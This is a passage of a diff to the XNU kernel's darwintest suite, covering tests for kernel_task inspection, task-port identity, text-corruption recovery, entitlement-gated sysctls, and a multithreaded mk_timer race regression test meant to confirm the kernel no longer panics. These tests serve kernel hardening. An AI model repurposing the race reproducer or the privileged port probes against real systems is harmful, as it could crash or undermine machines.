-#include <mach/host_priv.h>
-#include <mach/mach.h>
-#include <mach/mach_types.h>
-#include <mach/mach_vm.h>
-#include <mach/processor_set.h>
-#include <mach/task.h>
-#include <sys/sysctl.h>
-#include <unistd.h>
-
-T_GLOBAL_META(T_META_NAMESPACE("xnu.ipc"),
-    T_META_RUN_CONCURRENTLY(true));
-
-/*
- * Attempt to inspect kernel_task using a task_inspect_t.  Interact with the
- * kernel in the same way top(1) and lsmp(1) do.
- */
-
-static void
-check_secure_kernel(void)
-{
-       int secure_kern = 0;
-       size_t secure_kern_size = sizeof(secure_kern);
-
-       T_ASSERT_POSIX_SUCCESS(sysctlbyname("kern.secure_kernel", &secure_kern,
-           &secure_kern_size, NULL, 0), NULL);
-
-       if (secure_kern) {
-               T_SKIP("secure kernel: processor_set_tasks will not return kernel_task");
-       }
-}
-
-static void
-attempt_kernel_inspection(task_t task)
-{
-       pid_t pid = (pid_t)-1;
-       mach_msg_type_number_t i, count, thcnt;
-       struct task_basic_info_64 ti;
-       thread_act_array_t threads;
-
-       T_QUIET;
-       T_EXPECT_MACH_SUCCESS(pid_for_task(task, &pid), NULL);
-       T_LOG("Checking pid %d", pid);
-
-       if (pid != 0) {
-               return;
-       }
-
-       T_LOG("found kernel_task, attempting to inspect");
-
-       count = TASK_BASIC_INFO_64_COUNT;
-       T_EXPECT_MACH_SUCCESS(task_info(task, TASK_BASIC_INFO_64, (task_info_t)&ti,
-           &count), "task_info(... TASK_BASIC_INFO_64 ...)");
-
-       T_EXPECT_MACH_SUCCESS(task_threads(task, &threads, &thcnt), "task_threads");
-       T_LOG("Found %d kernel threads.", thcnt);
-       for (i = 0; i < thcnt; i++) {
-               kern_return_t kr;
-               thread_basic_info_data_t basic_info;
-               mach_msg_type_number_t bi_count = THREAD_BASIC_INFO_COUNT;
-
-               kr = thread_info(threads[i], THREAD_BASIC_INFO,
-                   (thread_info_t)&basic_info, &bi_count);
-               /*
-                * Ignore threads that have gone away.
-                */
-               if (kr == MACH_SEND_INVALID_DEST) {
-                       T_LOG("ignoring thread that has been destroyed");
-                       continue;
-               }
-               T_EXPECT_MACH_SUCCESS(kr, "thread_info(... THREAD_BASIC_INFO ...)");
-               (void)mach_port_deallocate(mach_task_self(), threads[i]);
-       }
-       mach_vm_deallocate(mach_task_self(),
-           (mach_vm_address_t)(uintptr_t)threads,
-           thcnt * sizeof(*threads));
-
-       ipc_info_space_basic_t basic_info;
-       T_EXPECT_MACH_SUCCESS(mach_port_space_basic_info(task, &basic_info), "mach_port_space_basic_info");
-
-       ipc_info_space_t info_space;
-       ipc_info_name_array_t table;
-       ipc_info_tree_name_array_t tree;
-       mach_msg_type_number_t tblcnt = 0, treecnt = 0;
-       T_EXPECT_MACH_SUCCESS(mach_port_space_info(task, &info_space, &table,
-           &tblcnt, &tree, &treecnt), "mach_port_space_info");
-       if (tblcnt > 0) {
-               mach_vm_deallocate(mach_task_self(),
-                   (mach_vm_address_t)(uintptr_t)table,
-                   tblcnt * sizeof(*table));
-       }
-       if (treecnt > 0) {
-               mach_vm_deallocate(mach_task_self(),
-                   (mach_vm_address_t)(uintptr_t)tree,
-                   treecnt * sizeof(*tree));
-       }
-
-       T_END;
-}
-
-T_DECL(inspect_kernel_task,
-    "ensure that kernel task can be inspected",
-    T_META_CHECK_LEAKS(false),
-    T_META_ASROOT(true))
-{
-       processor_set_name_array_t psets;
-       processor_set_t pset;
-       task_array_t tasks;
-       mach_msg_type_number_t i, j, tcnt, pcnt = 0;
-       mach_port_t self = mach_host_self();
-
-       check_secure_kernel();
-
-       T_ASSERT_MACH_SUCCESS(host_processor_sets(self, &psets, &pcnt),
-           NULL);
-
-       for (i = 0; i < pcnt; i++) {
-               T_ASSERT_MACH_SUCCESS(host_processor_set_priv(self, psets[i], &pset), NULL);
-               T_LOG("Checking pset %d/%d", i, pcnt - 1);
-
-               tcnt = 0;
-               T_ASSERT_MACH_SUCCESS(processor_set_tasks(pset, &tasks, &tcnt), NULL);
-
-               for (j = 0; j < tcnt; j++) {
-                       attempt_kernel_inspection(tasks[j]);
-                       mach_port_deallocate(self, tasks[j]);
-               }
-
-               /* free tasks array */
-               mach_vm_deallocate(mach_task_self(),
-                   (mach_vm_address_t)(uintptr_t)tasks,
-                   tcnt * sizeof(*tasks));
-               mach_port_deallocate(mach_task_self(), pset);
-               mach_port_deallocate(mach_task_self(), psets[i]);
-       }
-       mach_vm_deallocate(mach_task_self(),
-           (mach_vm_address_t)(uintptr_t)psets,
-           pcnt * sizeof(*psets));
-
-       T_FAIL("could not find kernel_task in list of tasks returned");
-}
diff --git a/tests/task_inspect.entitlements b/tests/task_inspect.entitlements
deleted file mode 100644 (file)
index eaaf1de..0000000
+++ /dev/null
@@ -1,10 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
-       <key>com.apple.system-task-ports</key>
-       <true/>
-       <key>task_for_pid-allow</key>
-       <true/>
-</dict>
-</plist>
diff --git a/tests/task_is_self.c b/tests/task_is_self.c
new file mode 100644 (file)
index 0000000..9882c46
--- /dev/null
@@ -0,0 +1,25 @@
+#include <darwintest.h>
+#include <mach/mach.h>
+#include <mach/task.h>
+#include <mach/mach_init.h>
+
+T_DECL(mach_task_is_self,
+    "test task port comparison check")
+{
+       mach_port_t self_insp, self_read, self_name, port;
+
+       T_ASSERT_MACH_SUCCESS(task_get_special_port(mach_task_self(), TASK_READ_PORT, &self_read), "task_get_special_port failed");
+       T_ASSERT_MACH_SUCCESS(task_get_special_port(mach_task_self(), TASK_INSPECT_PORT, &self_insp), "task_get_special_port failed");
+       T_ASSERT_MACH_SUCCESS(task_get_special_port(mach_task_self(), TASK_NAME_PORT, &self_name), "task_get_special_port failed");
+
+       T_ASSERT_MACH_SUCCESS(mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port), "mach_port_allocate failed");
+
+       T_EXPECT_NE(self_read, self_insp, "read and inspect port should be different");
+       T_EXPECT_NE(self_read, mach_task_self(), "read and control port should be different");
+
+       T_EXPECT_EQ(1, mach_task_is_self(mach_task_self()), "control port should point to self");
+       T_EXPECT_EQ(1, mach_task_is_self(self_read), "read port should point to self");
+       T_EXPECT_EQ(1, mach_task_is_self(self_insp), "inspect port should point to self");
+       T_EXPECT_EQ(1, mach_task_is_self(self_name), "name port should point to self");
+       T_EXPECT_NE(1, mach_task_is_self(port), "_port_ should not point to self");
+}
diff --git a/tests/test_dext_launch_56101852.c b/tests/test_dext_launch_56101852.c
deleted file mode 100644 (file)
index 99ad782..0000000
+++ /dev/null
@@ -1,101 +0,0 @@
-#include <darwintest.h>
-#include <CoreFoundation/CoreFoundation.h>
-#include <IOKit/kext/KextManager.h>
-#include <mach/mach_time.h>
-#include <sys/sysctl.h>
-#include <copyfile.h>
-#include <removefile.h>
-
-T_GLOBAL_META(T_META_NAMESPACE("xnu.iokit"),
-    T_META_RUN_CONCURRENTLY(true));
-
-#define DEXT_NAME "com.apple.test_intentionally_crashing_driver_56101852.dext"
-#define DEXT_PATH "/Library/DriverExtensions/" DEXT_NAME
-#define SYSCTL_NAME "kern.driverkit_checkin_timed_out"
-#define MAX_TIMEOUT_SECONDS 120
-
-static int
-copyfileCallback(int what __unused, int stage, copyfile_state_t state __unused, const char *src __unused, const char *dst, void *ctx __unused)
-{
-       if (stage == COPYFILE_FINISH) {
-               T_QUIET; T_ASSERT_POSIX_SUCCESS(chown(dst, 0, 0), "chown %s to root / wheel", dst);
-       }
-       return COPYFILE_CONTINUE;
-}
-
-static void
-cleanup(void)
-{
-       removefile_state_t state = removefile_state_alloc();
-       removefile(DEXT_PATH, state, REMOVEFILE_RECURSIVE);
-       removefile_state_free(state);
-}
-
-T_DECL(test_dext_launch_56101852,
-    "Test launching a crashing dext",
-    T_META_ASROOT(true), T_META_IGNORECRASHES("*test_intentionally_crashing_driver_56101852*"))
-{
-       T_SKIP("skipping test_dext_launch_56101852 due to 62657199");
-
-       CFStringRef path = NULL;
-       CFURLRef url = NULL;
-       uint64_t startTime = mach_absolute_time();
-       uint64_t endTime = 0;
-       size_t endTimeSize = sizeof(uint64_t);
-       uint64_t elapsedTimeAbs = 0;
-       uint64_t elapsedTimeNs = 0;
-       mach_timebase_info_data_t timebaseInfo;
-       copyfile_state_t copyfileState;
-
-       copyfileState = copyfile_state_alloc();
-       copyfile_state_set(copyfileState, COPYFILE_STATE_STATUS_CB, (void *)&copyfileCallback);
-       T_ASSERT_POSIX_SUCCESS(copyfile(DEXT_NAME, DEXT_PATH, copyfileState, COPYFILE_RECURSIVE | COPYFILE_ALL), "copied dext " DEXT_NAME " to " DEXT_PATH);
-       T_ATEND(cleanup);
-
-       /* set up timebaseInfo */
-       T_ASSERT_MACH_SUCCESS(mach_timebase_info(&timebaseInfo), "set up mach_timebase_info");
-
-       /* Set the initial value of kern.driverkit_checkin_timed_out to startTime */
-       T_ASSERT_POSIX_SUCCESS(sysctlbyname(SYSCTL_NAME, NULL, NULL, &startTime, sizeof(startTime)), "set sysctl " SYSCTL_NAME " to %llu", startTime);
-
-
-       /* Convert DEXT_PATH to a CFURL */
-       path = CFSTR(DEXT_PATH);
-       url = CFURLCreateWithFileSystemPath(kCFAllocatorDefault, path, kCFURLPOSIXPathStyle, true);
-       T_ASSERT_NOTNULL(url, "created CFURL from CFString");
-
-       /* Ask kextd to load the dext */
-       T_ASSERT_EQ(KextManagerLoadKextWithURL(url, NULL), kOSReturnSuccess, "Loaded dext %s with kextd", DEXT_PATH);
-       T_LOG("Will sleep for up to %d seconds", MAX_TIMEOUT_SECONDS);
-
-       /* Wait for up to 120 seconds. Each loop iteration sleeps for 1 second and checks
-        * the value of the sysctl to check if it has changed. If the value changed, then
-        * the dext loaded earlier has crashed. If 120 seconds elapses and the value does
-        * not change, then the dext did not crash.
-        */
-       for (int i = 0; i < MAX_TIMEOUT_SECONDS; i++) {
-               sleep(1);
-               T_ASSERT_POSIX_SUCCESS(sysctlbyname(SYSCTL_NAME, &endTime, &endTimeSize, NULL, 0), "using " SYSCTL_NAME " to check if dext has crashed");
-               if (endTime != startTime) {
-                       T_LOG("Detected dext crash");
-                       break;
-               }
-               T_LOG("    Slept for %d seconds", i + 1);
-       }
-
-       T_LOG("startTime = %llu, endTime = %llu", startTime, endTime);
-
-       T_ASSERT_GT(endTime, startTime, "dext has crashed");
-
-       /* Check how much time has elapsed and see if it is less than 120 seconds. If it
-        * is 120 seconds or greater, then the dext did not check in to the kernel but we
-        * were not able to stop waiting for the dext to check in after it crashed.
-        */
-       elapsedTimeAbs = endTime - startTime;
-       elapsedTimeNs = elapsedTimeAbs * timebaseInfo.numer / timebaseInfo.denom;
-       T_LOG("elapsedTimeAbs = %llu, elapsedTimeNs = %llu", elapsedTimeAbs, elapsedTimeNs);
-       T_ASSERT_LT(elapsedTimeNs / NSEC_PER_SEC, (uint64_t)MAX_TIMEOUT_SECONDS, "elapsed time is less than %d seconds", MAX_TIMEOUT_SECONDS);
-
-       copyfile_state_free(copyfileState);
-       CFRelease(url);
-}
diff --git a/tests/test_dext_launch_56101852.entitlements b/tests/test_dext_launch_56101852.entitlements
deleted file mode 100644 (file)
index 842b583..0000000
+++ /dev/null
@@ -1,8 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
-       <key>com.apple.private.security.storage.SystemExtensionManagement</key>
-       <true/>
-</dict>
-</plist>
diff --git a/tests/test_utils.c b/tests/test_utils.c
new file mode 100644 (file)
index 0000000..e5197d4
--- /dev/null
@@ -0,0 +1,25 @@
+#include <sys/kern_sysctl.h>
+#include <sys/sysctl.h>
+#include <dispatch/dispatch.h>
+#include <darwintest.h>
+
+#include "test_utils.h"
+
+bool
+is_development_kernel()
+{
+       static dispatch_once_t is_development_once;
+       static bool is_development;
+
+       dispatch_once(&is_development_once, ^{
+               int dev;
+               size_t dev_size = sizeof(dev);
+
+               T_QUIET;
+               T_ASSERT_POSIX_SUCCESS(sysctlbyname("kern.development", &dev,
+               &dev_size, NULL, 0), NULL);
+               is_development = (dev != 0);
+       });
+
+       return is_development;
+}
diff --git a/tests/test_utils.h b/tests/test_utils.h
new file mode 100644 (file)
index 0000000..655e699
--- /dev/null
@@ -0,0 +1,8 @@
+#ifndef XNU_DARWINTEST_UTILS_H
+#define XNU_DARWINTEST_UTILS_H
+
+#include <stdbool.h>
+
+/* Misc. utility functions for writing darwintests. */
+bool is_development_kernel(void);
+#endif /* !defined(XNU_DARWINTEST_UTILS_H) */
diff --git a/tests/text_corruption.c b/tests/text_corruption.c
new file mode 100644 (file)
index 0000000..d2ebe07
--- /dev/null
@@ -0,0 +1,80 @@
+#include <unistd.h>
+#include <stdio.h>
+
+#include <darwintest.h>
+#include <darwintest_utils.h>
+
+T_GLOBAL_META(T_META_RUN_CONCURRENTLY(false));
+
+/*
+ * No system(3c) on watchOS, so provide our own.
+ * returns -1 if fails to run
+ * returns 0 if process exits normally.
+ * returns +n if process exits due to signal N
+ */
+static int
+my_system(const char *command)
+{
+       pid_t pid;
+       int status = 0;
+       int signal = 0;
+       int err;
+       const char *argv[] = {
+               "/bin/sh",
+               "-c",
+               command,
+               NULL
+       };
+
+       if (dt_launch_tool(&pid, (char **)(void *)argv, FALSE, NULL, NULL)) {
+               return -1;
+       }
+
+       err = dt_waitpid(pid, &status, &signal, 30);
+       if (err) {
+               return 0;
+       }
+
+       return signal;
+}
+
+
+/*
+ * The tests are run in the following order:
+ *
+ * - call foo
+ * - corrupt foo, then call foo
+ * - call foo
+ *
+ * - call atan
+ * - corrupt atan, then call atan
+ * - call atan
+ *
+ * The first and last of each should exit normally. The middle one should exit with SIGILL.
+ *
+ * atan() was picked as a shared region function that isn't likely used by any normal daemons.
+ */
+T_DECL(text_corruption_recovery, "test detection/recovery of text corruption",
+    T_META_IGNORECRASHES(".*text_corruption_helper.*"),
+    T_META_ASROOT(true))
+{
+       int ret;
+
+       ret = my_system("./text_corruption_helper foo");
+       T_QUIET; T_ASSERT_EQ(ret, 0, "First call of foo");
+
+       ret = my_system("./text_corruption_helper Xfoo");
+       T_QUIET; T_ASSERT_EQ(ret, SIGILL, "Call of corrupted foo");
+
+       ret = my_system("./text_corruption_helper foo");
+       T_QUIET; T_ASSERT_EQ(ret, 0, "Fixed call of foo");
+
+       ret = my_system("./text_corruption_helper atan");
+       T_QUIET; T_ASSERT_EQ(ret, 0, "First call of atan");
+
+       ret = my_system("./text_corruption_helper Xatan");
+       T_QUIET; T_ASSERT_EQ(ret, SIGILL, "Call of corrupted atan");
+
+       ret = my_system("./text_corruption_helper atan");
+       T_QUIET; T_ASSERT_EQ(ret, 0, "Fixed call of atan");
+}
diff --git a/tests/text_corruption_helper.c b/tests/text_corruption_helper.c
new file mode 100644 (file)
index 0000000..576836a
--- /dev/null
@@ -0,0 +1,56 @@
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <sys/sysctl.h>
+#include <ptrauth.h>
+#include <math.h>
+#include <string.h>
+
+__attribute__((noinline))
+static void
+foo(void)
+{
+       printf("In foo()\n");
+       fflush(stdout);
+}
+
+/*
+ * volatile to stop the compiler from optimizing away calls to atan()
+ */
+volatile double zero = 0.0;
+
+int
+main(int argc, char **argv)
+{
+       void *addr;
+       size_t s = sizeof(addr);
+       int err;
+       int a;
+
+       /*
+        * needs to run as root for sysctl.
+        */
+       if (geteuid() != 0) {
+               printf("Test not running as root\n");
+               exit(-1);
+       }
+
+       if (strcmp(argv[argc - 1], "foo") == 0) {
+               foo();
+       } else if (strcmp(argv[argc - 1], "Xfoo") == 0) {
+               printf("Warm up call to foo()\n");
+               foo();
+               addr = ptrauth_strip(&foo, ptrauth_key_function_pointer);
+               err = sysctlbyname("vm.corrupt_text_addr", NULL, NULL, &addr, s);
+               foo();
+       } else if (strcmp(argv[argc - 1], "atan") == 0) {
+               printf("atan(0) is %g\n", atan(zero));
+       } else if (strcmp(argv[argc - 1], "Xatan") == 0) {
+               printf("Warmup call to atan(0) is %g\n", atan(zero));
+               addr = ptrauth_strip(&atan, ptrauth_key_function_pointer);
+               err = sysctlbyname("vm.corrupt_text_addr", NULL, NULL, &addr, s);
+               printf("atan(0) is %g\n", atan(zero));
+       } else {
+               exit(-1);
+       }
+}
diff --git a/tests/thread_call_race_71455282.c b/tests/thread_call_race_71455282.c
new file mode 100644 (file)
index 0000000..df5d8c8
--- /dev/null
@@ -0,0 +1,52 @@
+#include <darwintest.h>
+#include <pthread.h>
+#include <sys/syscall.h>
+#include <unistd.h>
+
+#include <mach/mach_init.h>
+#include <mach/mach_port.h>
+#include <mach/mk_timer.h>
+#include <mach/task.h>
+
+#define die(w) errx(1, (w))
+#define edie(w) err(1, (w))
+#define expect(e) if (-1 == (e)) edie(#e)
+
+static void *
+racer(void *data)
+{
+       for (;;) {
+               mk_timer_destroy(*(mach_port_t *)data);
+       }
+
+       return NULL;
+}
+
+T_DECL(thread_call_race_71455282,
+    "rdar://71455282",
+    T_META_IGNORECRASHES(".*thread_call_race_71455282.*"))
+{
+       mach_port_t timer = MACH_PORT_NULL;
+       pthread_t t;
+       size_t n;
+
+       /* we will violate mach rules so ignore crashes here */
+       T_ASSERT_MACH_SUCCESS(task_set_exc_guard_behavior(mach_task_self(), 0),
+           "task_set_exc_guard_behavior");
+
+       for (n = 0; n < 4; ++n) {
+               T_ASSERT_POSIX_SUCCESS(pthread_create(&t, NULL, racer, &timer),
+                   "pthread_create");
+       }
+
+       T_LOG("racing");
+       for (size_t i = 0; i < 1000; i++) {
+               timer = mk_timer_create();
+               mk_timer_arm(timer, 1);
+               mk_timer_destroy(timer);
+               timer = MACH_PORT_NULL;
+       }
+
+       T_PASS("didn't panic");
+       T_END;
+}
diff --git a/tests/trial_experiments.c b/tests/trial_experiments.c
new file mode 100644 (file)
index 0000000..fd197cd
--- /dev/null
@@ -0,0 +1,83 @@
+#include <errno.h>
+#include <sys/types.h>
+#include <sys/sysctl.h>
+
+#include <darwintest.h>
+
+#include "drop_priv.h"
+#include "test_utils.h"
+
+#if ENTITLED
+#define SET_TREATMENT_ID set_treatment_id_entitled
+#define SET_TREATMENT_ID_DESCR "Can set treatment id with entitlement"
+#else /* ENTITLED */
+#define SET_TREATMENT_ID set_treatment_id_unentitled
+#define SET_TREATMENT_ID_DESCR "Can't set treatment id without entitlement"
+#endif /* ENTITLED */
+
+T_DECL(SET_TREATMENT_ID, "Verifies that EXPERIMENT sysctls can only be set with the entitlement", T_META_ASROOT(false))
+{
+#define TEST_STR "testing"
+#define IDENTIFIER_LENGTH 36
+
+       int ret;
+       errno_t err;
+       char val[IDENTIFIER_LENGTH + 1] = {0};
+       size_t len = sizeof(val);
+       char new_val[IDENTIFIER_LENGTH + 1] = {0};
+
+       if (!is_development_kernel()) {
+               T_SKIP("skipping test on release kernel");
+       }
+
+       strlcpy(new_val, TEST_STR, sizeof(new_val));
+       drop_priv();
+
+       ret = sysctlbyname("kern.trial_treatment_id", val, &len, new_val, strlen(new_val));
+       err = errno;
+#if ENTITLED
+       len = sizeof(val);
+       memset(new_val, 0, sizeof(new_val));
+       T_ASSERT_POSIX_SUCCESS(ret, "set kern.trial_treatment_id");
+       /* Cleanup. Set it back to the empty string. */
+       ret = sysctlbyname("kern.trial_treatment_id", val, &len, new_val, 1);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "reset kern.trial_treatment_id");
+#else
+       T_ASSERT_POSIX_FAILURE(ret, EPERM, "set kern.trial_treatment_id");
+#endif /* ENTITLED */
+}
+
+#if ENTITLED
+/* Check min and max value limits on numeric factors */
+T_DECL(experiment_factor_numeric_limits,
+    "Can only set factors within the legal range.",
+    T_META_ASROOT(false))
+{
+#define kMinVal 5 /* The min value allowed for the testing factor. */
+#define kMaxVal 10 /* The max value allowed for the testing factor. */
+       errno_t err;
+       int ret;
+       unsigned int current_val;
+       size_t len = sizeof(current_val);
+       unsigned int new_val;
+
+       drop_priv();
+       new_val = kMinVal - 1;
+       ret = sysctlbyname("kern.testing_experiment_factor", &current_val, &len, &new_val, sizeof(new_val));
+       err = errno;
+       T_ASSERT_POSIX_FAILURE(ret, EINVAL, "set kern.testing_experiment_factor below range.");
+
+       new_val = kMaxVal + 1;
+       ret = sysctlbyname("kern.testing_experiment_factor", &current_val, &len, &new_val, sizeof(new_val));
+       err = errno;
+       T_ASSERT_POSIX_FAILURE(ret, EINVAL, "set kern.testing_experiment_factor above range.");
+
+       new_val = kMaxVal;
+       ret = sysctlbyname("kern.testing_experiment_factor", &current_val, &len, &new_val, sizeof(new_val));
+       T_ASSERT_POSIX_SUCCESS(ret, "set kern.testing_experiment_factor at top of range.");
+
+       new_val = kMinVal;
+       ret = sysctlbyname("kern.testing_experiment_factor", &current_val, &len, &new_val, sizeof(new_val));
+       T_ASSERT_POSIX_SUCCESS(ret, "set kern.testing_experiment_factor at bottom of range.");
+}
+#endif /* ENTITLED */
diff --git a/tests/trial_experiments.entitlements b/tests/trial_experiments.entitlements
new file mode 100644 (file)
index 0000000..4d1bd47
--- /dev/null
@@ -0,0 +1,8 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+       <key>com.apple.private.write-kr-experiment-factors</key>
+       <true/>
+</dict>
+</plist>
index 3cf9ef1b2d8132f68eb0e2a41ae47f2b08147da8..fbfcb39510352130bf1d63e1ac91958491f5838f 100644 (file)
@@ -42,7 +42,7 @@
 #include <pthread.h>
 #include <stdatomic.h>
 
-#include "vm/perf_helpers.h"
+#include "benchmark/helpers.h"
 
 #if (TARGET_OS_OSX || TARGET_OS_SIMULATOR)
 /*
@@ -121,10 +121,6 @@ typedef struct test_args {
        bool verbose;
 } test_args_t;
 
-/* Get a (wall-time) timestamp in nanoseconds */
-static uint64_t get_timestamp_ns(void);
-/* Get the number of cpus on this device. */
-static unsigned int get_ncpu(void);
 /*
  * Fault in the pages in the given buffer.
  */
@@ -197,7 +193,7 @@ main(int argc, char **argv)
 #else
        static const size_t memory_per_core = 25 * (1UL << 20);
 #endif /* (TARGET_OS_OSX || TARGET_OS_SIMULATOR) */
-       const size_t kMemSize = memory_per_core * get_ncpu();
+       const size_t kMemSize = memory_per_core * (size_t) get_ncpu();
        test_globals_t *globals = allocate_test_globals();
        /* Total wall-time spent faulting in pages. */
        uint64_t wall_time_elapsed_ns = 0;
@@ -368,7 +364,7 @@ start_iteration(test_globals_t* globals, test_variant_t variant, bool verbose)
        setup_memory(globals, variant);
        benchmark_log(verbose, "Initialized data structures for iteration. Waking workers.\n");
        /* Grab a timestamp, tick the current iteration, and wake up the worker threads */
-       start_time = get_timestamp_ns();
+       start_time = current_timestamp_ns();
        globals->tg_current_iteration++;
        ret = pthread_mutex_unlock(&globals->tg_lock);
        assert(ret == 0);
@@ -387,7 +383,7 @@ finish_iteration(test_globals_t* globals, uint64_t start_time)
        while (globals->tg_iterations_completed != globals->tg_current_iteration) {
                ret = pthread_cond_wait(&globals->tg_cv, &globals->tg_lock);
        }
-       end_time = get_timestamp_ns();
+       end_time = current_timestamp_ns();
        ret = pthread_mutex_unlock(&globals->tg_lock);
        unmap_fault_buffers(globals);
        assert(ret == 0);
@@ -602,22 +598,6 @@ print_help(char** argv)
        fprintf(stderr, "       %s              Share vm objects across faulting threads.\n", kShareObjectsArgument);
 }
 
-static uint64_t
-get_timestamp_ns()
-{
-       return clock_gettime_nsec_np(kWallTimeClock);
-}
-
-static unsigned int
-get_ncpu(void)
-{
-       int ncpu;
-       size_t sysctl_size = sizeof(ncpu);
-       int ret = sysctlbyname("hw.ncpu", &ncpu, &sysctl_size, NULL, 0);
-       assert(ret == 0);
-       return (unsigned int) ncpu;
-}
-
 static void
 parse_arguments(int argc, char** argv, test_args_t *args)
 {
diff --git a/tests/vm/page_size_globals.c b/tests/vm/page_size_globals.c
new file mode 100644 (file)
index 0000000..3e563ce
--- /dev/null
@@ -0,0 +1,43 @@
+#include <darwintest.h>
+#include <mach/vm_page_size.h>
+
+T_GLOBAL_META(
+       T_META_NAMESPACE("vm_page_size_overrides")
+       );
+
+static void
+verify_page_size(
+       int expected_shift,
+       int page_shift,
+       vm_size_t page_size,
+       vm_size_t page_mask)
+{
+       T_ASSERT_EQ(page_shift, expected_shift, "page_shift");
+       T_ASSERT_EQ(page_size, 1UL << expected_shift, "page_size");
+       T_ASSERT_EQ(page_mask, page_size - 1, "page_mask");
+}
+
+
+T_DECL(kernel_4k,
+    "Can override vm_kernel_page_size",
+    T_META_ENVVAR("VM_KERNEL_PAGE_SIZE_4K=1"),
+    T_META_ENVVAR("MallocGuardEdges=0"),
+    T_META_ENVVAR("MallocDoNotProtectPrelude=1"),
+    T_META_ENVVAR("MallocDoNotProtectPostlude=1"))
+{
+       verify_page_size(12, vm_kernel_page_shift, vm_kernel_page_size, vm_kernel_page_mask);
+}
+
+T_DECL(invalid,
+    "Invalid overrides",
+    T_META_ENVVAR("VM_KERNEL_PAGE_SIZE_4K=2"),
+    T_META_ENVVAR("VM_KERNEL_PAGE_SIZE=4K"),
+    T_META_ENVVAR("VM_KERNEL_PAGE_SIZE="))
+{
+       /*
+        * This test just verifies that libkernel_init doesn't
+        * crash when handling invalid overrides.
+        * So if we got here, we can pass the test.
+        */
+       T_PASS("Test process spawned");
+}
diff --git a/tests/vm/perf_helpers.c b/tests/vm/perf_helpers.c
deleted file mode 100644 (file)
index b4dea31..0000000
+++ /dev/null
@@ -1,69 +0,0 @@
-#include <assert.h>
-#include <errno.h>
-#include <stdarg.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-
-#include <sys/mman.h>
-
-#include "vm/perf_helpers.h"
-
-#define K_CTIME_BUFFER_LEN  26
-void
-benchmark_log(bool verbose, const char *restrict fmt, ...)
-{
-       time_t now;
-       char time_buffer[K_CTIME_BUFFER_LEN];
-       struct tm local_time;
-       va_list args;
-       if (verbose) {
-               strncpy(time_buffer, "UNKNOWN", K_CTIME_BUFFER_LEN);
-
-               now = time(NULL);
-               if (now != -1) {
-                       struct tm* ret = localtime_r(&now, &local_time);
-                       if (ret == &local_time) {
-                               snprintf(time_buffer, K_CTIME_BUFFER_LEN,
-                                   "%.2d/%.2d/%.2d %.2d:%.2d:%.2d",
-                                   local_time.tm_mon + 1, local_time.tm_mday,
-                                   local_time.tm_year + 1900,
-                                   local_time.tm_hour, local_time.tm_min,
-                                   local_time.tm_sec);
-                       }
-               }
-
-               printf("%s: ", time_buffer);
-               va_start(args, fmt);
-               vprintf(fmt, args);
-               fflush(stdout);
-       }
-}
-
-uint64_t
-timespec_difference_us(const struct timespec* a, const struct timespec* b)
-{
-       assert(a->tv_sec >= b->tv_sec || a->tv_nsec >= b->tv_nsec);
-       long seconds_elapsed = a->tv_sec - b->tv_sec;
-       uint64_t nsec_elapsed;
-       if (b->tv_nsec > a->tv_nsec) {
-               seconds_elapsed--;
-               nsec_elapsed = kNumNanosecondsInSecond - (uint64_t) (b->tv_nsec - a->tv_nsec);
-       } else {
-               nsec_elapsed = (uint64_t) (a->tv_nsec - b->tv_nsec);
-       }
-       return (uint64_t) seconds_elapsed * kNumMicrosecondsInSecond + nsec_elapsed / kNumNanosecondsInMicrosecond;
-}
-
-unsigned char *
-mmap_buffer(size_t memsize)
-{
-       int fd = -1;
-       unsigned char* addr = (unsigned char *)mmap(NULL, memsize, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE,
-           fd, 0);
-       if ((void*) addr == MAP_FAILED) {
-               fprintf(stderr, "Unable to mmap a memory object: %s\n", strerror(errno));
-               exit(2);
-       }
-       return addr;
-}
diff --git a/tests/vm/perf_helpers.h b/tests/vm/perf_helpers.h
deleted file mode 100644 (file)
index 53633f5..0000000
+++ /dev/null
@@ -1,34 +0,0 @@
-#ifndef VM_PERF_HELPERS_H
-#define VM_PERF_HELPERS_H
-
-/*
- * Utility functions and constants used by the VM perf tests.
- */
-#include <inttypes.h>
-#include <time.h>
-#include <stdbool.h>
-
-/*
- * mmap an anonymous chunk of memory.
- */
-unsigned char *mmap_buffer(size_t size);
-/*
- * Returns a - b in microseconds.
- * NB: a must be >= b
- */
-uint64_t timespec_difference_us(const struct timespec* a, const struct timespec* b);
-/*
- * Print the message to stdout along with the current time.
- * Also flushes stdout so that the log can help detect hangs. Don't call
- * this function from within the measured portion of the benchmark as it will
- * pollute your measurement.
- *
- * NB: Will only log if verbose == true.
- */
-void benchmark_log(bool verbose, const char *restrict fmt, ...) __attribute__((format(printf, 2, 3)));
-
-static const uint64_t kNumMicrosecondsInSecond = 1000UL * 1000;
-static const uint64_t kNumNanosecondsInMicrosecond = 1000UL;
-static const uint64_t kNumNanosecondsInSecond = kNumNanosecondsInMicrosecond * kNumMicrosecondsInSecond;
-
-#endif /* !defined(VM_PERF_HELPERS_H) */
index b579361b3eb240782333b2524764f9ef425d1dec..c8fd4548728321deea28ab4985c8ad01994b1d73 100644 (file)
@@ -12,7 +12,7 @@
 #include <sys/mman.h>
 #include <sys/sysctl.h>
 
-#include "vm/perf_helpers.h"
+#include "benchmark/helpers.h"
 
 typedef enum test_variant {
        VARIANT_MADVISE_FREE
diff --git a/tests/vm/retired_pages.c b/tests/vm/retired_pages.c
new file mode 100644 (file)
index 0000000..95a5706
--- /dev/null
@@ -0,0 +1,46 @@
+#include <sys/sysctl.h>
+#include <time.h>
+
